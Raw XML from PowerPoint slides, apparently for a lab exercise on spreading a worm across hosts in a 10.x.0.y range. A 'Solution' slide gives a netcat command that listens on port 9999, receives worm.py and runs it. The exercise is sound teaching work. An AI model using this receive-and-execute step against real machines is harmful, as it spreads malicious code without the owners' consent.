                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11D9E102-5D30-2F24-D2F1-183829A8F6E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5929885" y="1578691"/>
            <a:ext cx="6611558" cy="3454176"/>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8DD31AE9-964B-8879-4739-FB95E00740DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3072063" y="1477108"/>
            <a:ext cx="4926425" cy="4626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96A405-211B-6016-6F92-8922600F6940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3154566" y="5221705"/>
            <a:ext cx="5018887" cy="109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3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C60603-5289-86FD-BD47-89EC190BE2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2609188" y="0"/>
            <a:ext cx="6973624" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8694F12-BCC8-83E6-0B83-E5E4DF90CF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4972661" y="568958"/>
            <a:ext cx="209160" cy="500040"/>
            <a:chOff x="4972661" y="568958"/>
            <a:chExt cx="209160" cy="500040"/>
          </a:xfrm>
        </p:grpSpPr>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F2B60662-3B3A-031C-4331-2CE84F03EC4B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4972661" y="568958"/>
                <a:ext cx="209160" cy="321840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B60662-3B3A-031C-4331-2CE84F03EC4B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4937021" y="533318"/>
                  <a:ext cx="2808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9FE6DD4E-A3A8-08EC-9E4B-195749F3415B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5077061" y="1034438"/>
                <a:ext cx="12960" cy="34560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE6DD4E-A3A8-08EC-9E4B-195749F3415B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5041061" y="998438"/>
                  <a:ext cx="8460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32F952DC-D0B7-C817-D602-18A9422EFD3E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3535541" y="607838"/>
              <a:ext cx="1285560" cy="251280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="Ink 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F952DC-D0B7-C817-D602-18A9422EFD3E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3531221" y="603518"/>
                <a:ext cx="1294200" cy="259920"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A234272-EA3F-6A45-6A8D-70E862226588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483823" y="429133"/>
            <a:ext cx="2049585" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>10.X.0.Y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>X = [151-153] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Y = [71 - 75]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E65A28-8806-ECC8-C1E9-79EEB4F73087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3906253" y="5542548"/>
            <a:ext cx="3841116" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.  send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to an infected host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299738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639D-2904-4D21-F12B-5D150866B915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642D96E7-B1FA-9FBB-FFFE-D7A2F9643464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="920926" y="1442811"/>
            <a:ext cx="5928874" cy="944962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD5C0CB-FEB0-33CF-7B08-4DE3E47ABB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2415832" y="5526960"/>
            <a:ext cx="8855242" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lnv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 9999 &gt; worm.py &amp;&amp; python3 worm.py                  "   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB43E223-2DE3-B8D5-CD21-3AC2D589B647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="920926" y="2852108"/>
            <a:ext cx="4983912" cy="2674852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F159C616-AA6E-C5BB-2803-1790B28CD5EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7352218" y="2852108"/>
            <a:ext cx="2657266" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the infected machine will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>listens port 9999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>receives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worm.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worm.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A6F450-B540-ADF6-7F98-7DDD99BFA874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669585" y="5991295"/>
            <a:ext cx="5136325" cy="579170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C90A9CB-8B1A-D1FA-086D-7A7C2B9AB102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6079661" y="4740278"/>
            <a:ext cx="324360" cy="935640"/>
            <a:chOff x="6079661" y="4740278"/>
            <a:chExt cx="324360" cy="935640"/>
          </a:xfrm>
        </p:grpSpPr>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8B35699B-9AB9-FCB6-4706-0FC052425BA7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6079661" y="4740278"/>
                <a:ext cx="218160" cy="802800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B35699B-9AB9-FCB6-4706-0FC052425BA7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6062021" y="4722278"/>
                  <a:ext cx="253800" cy="83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5F795760-310C-207D-B373-294184D4EC0D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6095501" y="5357678"/>
                <a:ext cx="308520" cy="318240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Ink 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F795760-310C-207D-B373-294184D4EC0D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6077861" y="5340038"/>
                  <a:ext cx="344160" cy="353880"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3754918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FCCFC-6D47-2BC2-5D31-EA724500A0CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895678" y="4835690"/>
            <a:ext cx="8832345" cy="1828958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC8E8CF-8CB1-FE9D-8D15-9DF044BB887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895678" y="3271977"/>
            <a:ext cx="8900931" cy="1432684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9A9F15-7550-17B0-E866-7188CBD203F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126546" y="705415"/>
            <a:ext cx="9205758" cy="1447925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CF71A3C-EC36-4BB7-D2A5-C1AD3568DF59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5184400" y="290433"/>
            <a:ext cx="5186880" cy="3362040"/>
            <a:chOff x="5184400" y="290433"/>
            <a:chExt cx="5186880" cy="3362040"/>
          </a:xfrm>
        </p:grpSpPr>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10D483D8-ABAB-B5A4-F8B6-9B0FF4AF20ED}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5204560" y="290433"/>
                <a:ext cx="5166720" cy="3319560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D483D8-ABAB-B5A4-F8B6-9B0FF4AF20ED}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5186560" y="272433"/>
                  <a:ext cx="5202360" cy="335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34EE5EB-DBD9-5B81-4245-4DE4BF8BB73A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5184400" y="3325593"/>
                <a:ext cx="193320" cy="326880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34EE5EB-DBD9-5B81-4245-4DE4BF8BB73A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5166760" y="3307593"/>
                  <a:ext cx="228960" cy="362520"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE46BA21-2451-399E-0D95-BF75419D0322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9566031" y="1798655"/>
            <a:ext cx="2312236" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use different terminals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733DBFEF-B891-A478-8EE2-7DE20E19C672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7884341" y="1804478"/>
            <a:ext cx="2980440" cy="3036600"/>
            <a:chOff x="7884341" y="1804478"/>
            <a:chExt cx="2980440" cy="3036600"/>
          </a:xfrm>
        </p:grpSpPr>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7A726144-EF4C-BEF6-9595-123969979E2E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7884341" y="1804478"/>
                <a:ext cx="2872440" cy="3013560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="12" name="Ink 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A726144-EF4C-BEF6-9595-123969979E2E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7875341" y="1795478"/>
                  <a:ext cx="2890080" cy="303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DC39A007-C427-ED9A-7D3B-107BCFBBD67F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
